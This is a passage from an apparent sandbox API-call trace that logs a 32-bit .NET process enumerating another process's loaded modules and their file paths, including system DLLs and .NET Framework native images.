CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.150] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0144.150] CoTaskMemFree (pv=0x55b0d0) [0144.150] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.150] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0144.151] CoTaskMemFree (pv=0x55b0d0) [0144.151] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x23b83d4, cb=0xc | out: lpmodinfo=0x23b83d4*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0144.151] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.151] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0144.151] CoTaskMemFree (pv=0x55b0d0) [0144.151] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.151] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0144.152] CoTaskMemFree (pv=0x55b0d0) [0144.152] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x23ba51c, cb=0xc | out: lpmodinfo=0x23ba51c*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0144.152] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.152] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0144.152] CoTaskMemFree (pv=0x55b0d0) [0144.152] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.152] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0144.153] CoTaskMemFree (pv=0x55b0d0) [0144.153] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x23bc628, cb=0xc | out: lpmodinfo=0x23bc628*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0144.153] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.153] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0144.154] CoTaskMemFree (pv=0x55b0d0) [0144.154] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.154] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0144.154] CoTaskMemFree (pv=0x55b0d0) [0144.154] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x23be73c, cb=0xc | out: lpmodinfo=0x23be73c*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0144.154] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.154] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0144.155] CoTaskMemFree (pv=0x55b0d0) [0144.155] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.155] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0144.155] CoTaskMemFree (pv=0x55b0d0) [0144.155] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x23c0848, cb=0xc | out: lpmodinfo=0x23c0848*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0144.155] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.155] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0144.156] CoTaskMemFree (pv=0x55b0d0) [0144.582] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.582] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0144.583] CoTaskMemFree (pv=0x55b0d0) [0144.583] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x23c29a0, cb=0xc | out: lpmodinfo=0x23c29a0*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0144.583] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.583] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0144.583] CoTaskMemFree (pv=0x55b0d0) [0144.583] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.583] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0144.584] CoTaskMemFree (pv=0x55b0d0) [0144.584] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x23c4aac, cb=0xc | out: lpmodinfo=0x23c4aac*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0144.584] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.584] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0144.585] CoTaskMemFree (pv=0x55b0d0) [0144.585] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.585] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0144.585] CoTaskMemFree (pv=0x55b0d0) [0144.585] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x23c6bb8, cb=0xc | out: lpmodinfo=0x23c6bb8*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0144.586] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.586] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0144.586] CoTaskMemFree (pv=0x55b0d0) [0144.586] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.586] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0144.587] CoTaskMemFree (pv=0x55b0d0) [0144.587] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x23c8ccc, cb=0xc | out: lpmodinfo=0x23c8ccc*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0144.587] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.587] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0144.628] CoTaskMemFree (pv=0x55b0d0) [0144.628] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.628] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0144.628] CoTaskMemFree (pv=0x55b0d0) [0144.628] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x23cae00, cb=0xc | out: lpmodinfo=0x23cae00*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0144.629] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.629] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0144.629] CoTaskMemFree (pv=0x55b0d0) [0144.629] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.629] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0144.630] CoTaskMemFree (pv=0x55b0d0) [0144.630] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x23ccf48, cb=0xc | out: lpmodinfo=0x23ccf48*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0144.630] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.630] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0144.631] CoTaskMemFree (pv=0x55b0d0) [0144.631] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.631] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0144.631] CoTaskMemFree (pv=0x55b0d0) [0144.631] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x23cf054, cb=0xc | out: lpmodinfo=0x23cf054*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0144.632] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.632] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0144.632] CoTaskMemFree (pv=0x55b0d0) [0144.632] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.632] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0144.633] CoTaskMemFree (pv=0x55b0d0) [0144.633] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x23d1160, cb=0xc | out: lpmodinfo=0x23d1160*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0144.633] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.633] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0144.634] CoTaskMemFree (pv=0x55b0d0) [0144.634] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.634] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0144.661] CoTaskMemFree (pv=0x55b0d0) [0144.661] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x23d32f0, cb=0xc | out: lpmodinfo=0x23d32f0*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0144.661] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.661] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0144.662] CoTaskMemFree (pv=0x55b0d0) [0144.662] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.662] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0144.662] CoTaskMemFree (pv=0x55b0d0) [0144.662] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x23d53fc, cb=0xc | out: lpmodinfo=0x23d53fc*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0144.663] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.663] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0144.663] CoTaskMemFree (pv=0x55b0d0) [0144.664] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.664] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0144.664] CoTaskMemFree (pv=0x55b0d0) [0144.664] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x23d7500, cb=0xc | out: lpmodinfo=0x23d7500*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0144.665] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.665] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0144.665] CoTaskMemFree (pv=0x55b0d0) [0144.665] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.665] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0144.710] CoTaskMemFree (pv=0x55b0d0) [0144.710] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x23d962c, cb=0xc | out: lpmodinfo=0x23d962c*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0144.711] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.711] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0144.711] CoTaskMemFree (pv=0x55b0d0) [0144.711] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.711] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0144.712] CoTaskMemFree (pv=0x55b0d0) [0144.712] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x23db738, cb=0xc | out: lpmodinfo=0x23db738*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0144.717] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.717] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0144.718] CoTaskMemFree (pv=0x55b0d0) [0144.718] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.718] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0144.719] CoTaskMemFree (pv=0x55b0d0) [0144.719] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x23dd868, cb=0xc | out: lpmodinfo=0x23dd868*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0144.719] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.719] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0144.720] CoTaskMemFree (pv=0x55b0d0) [0144.720] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.720] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0144.721] CoTaskMemFree (pv=0x55b0d0) [0144.721] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x23df99c, cb=0xc | out: lpmodinfo=0x23df99c*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0144.722] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.722] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0144.722] CoTaskMemFree (pv=0x55b0d0) [0144.722] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.722] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0144.723] CoTaskMemFree (pv=0x55b0d0) [0144.723] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x23e1b44, cb=0xc | out: lpmodinfo=0x23e1b44*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0144.724] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.724] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0144.724] CoTaskMemFree (pv=0x55b0d0) [0144.724] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.724] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0144.725] CoTaskMemFree (pv=0x55b0d0) [0144.725] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x23e3c48, cb=0xc | out: lpmodinfo=0x23e3c48*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0144.725] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.725] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0144.726] CoTaskMemFree (pv=0x55b0d0) [0144.726] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.726] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0144.727] CoTaskMemFree (pv=0x55b0d0) [0144.727] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, lpmodinfo=0x23e5d54, cb=0xc | out: lpmodinfo=0x23e5d54*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0144.727] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.727] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0144.873] CoTaskMemFree (pv=0x55b0d0) [0144.873] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.873] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0144.874] CoTaskMemFree (pv=0x55b0d0) [0144.874] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x23e7e94, cb=0xc | out: lpmodinfo=0x23e7e94*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0144.875] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.875] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0144.875] CoTaskMemFree (pv=0x55b0d0) [0144.875] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.875] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0144.876] CoTaskMemFree (pv=0x55b0d0) [0144.876] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x23e9fa8, cb=0xc | out: lpmodinfo=0x23e9fa8*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0144.877] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.877] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0144.878] CoTaskMemFree (pv=0x55b0d0) [0144.878] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.878] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0144.879] CoTaskMemFree (pv=0x55b0d0) [0144.879] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x23ec144, cb=0xc | out: lpmodinfo=0x23ec144*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0144.879] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.879] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0144.880] CoTaskMemFree (pv=0x55b0d0) [0144.880] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.880] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0144.881] CoTaskMemFree (pv=0x55b0d0) [0144.881] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x23ee310, cb=0xc | out: lpmodinfo=0x23ee310*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0144.882] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.882] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0144.883] CoTaskMemFree (pv=0x55b0d0) [0144.883] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.883] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0144.884] CoTaskMemFree (pv=0x55b0d0) [0144.884] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x23f0500, cb=0xc | out: lpmodinfo=0x23f0500*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0144.927] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.927] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0144.927] CoTaskMemFree (pv=0x55b0d0) [0144.928] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.928] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0144.928] CoTaskMemFree (pv=0x55b0d0) [0144.929] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x23f26c4, cb=0xc | out: lpmodinfo=0x23f26c4*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0144.929] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.929] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0144.930] CoTaskMemFree (pv=0x55b0d0) [0144.930] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.930] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: 